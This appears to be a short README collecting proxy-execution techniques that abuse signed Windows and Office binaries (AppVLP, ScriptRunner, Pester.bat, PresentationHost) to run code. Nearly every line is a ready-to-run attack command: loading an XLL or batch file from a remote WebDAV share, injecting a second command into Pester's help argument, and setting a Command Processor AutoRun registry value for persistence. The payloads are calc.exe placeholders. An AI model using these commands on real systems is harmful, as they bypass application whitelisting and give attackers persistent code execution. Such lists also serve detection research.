└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | # Code Execution...
 2 | Generally useless ways to exec code.
 3 | 
 4 | ## appvlp.exe
 5 | ```
 6 | C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"
 7 | C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
 8 | C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe \\webdav\calc.bat
 9 | ```
10 | 
11 | ## scriptrunner.exe
12 | ```
13 | C:\Windows\System32\ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
14 | C:\Windows\System32\ScriptRunner.exe -appvscript powershell.exe -args
15 | ```
16 | 
17 | ## pester.bat
18 | ```
19 | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat help  "; Get-Process"
20 | ```
21 | 
22 | ##  powershellcustomhost.exe (Likely installed with IIS)
23 | ```
24 | C:\Program Files\IIS\Microsoft Web Deploy V3\Scripts\powershellcustomhost.exe calc.ps1
25 | ```
26 | 
27 | ## presentationhost.exe 
28 | ```
29 | PresentationHost.exe file://c:\windows\system32\calc.exe
30 | ```
31 | 
32 | ## command processor
33 | ```
34 | reg add "HKCU\Software\Microsoft\Command Processor" /v AutoRun /d "start calc.exe"
35 | open a command prompt and calculate.
36 | ```
37 | 


--------------------------------------------------------------------------------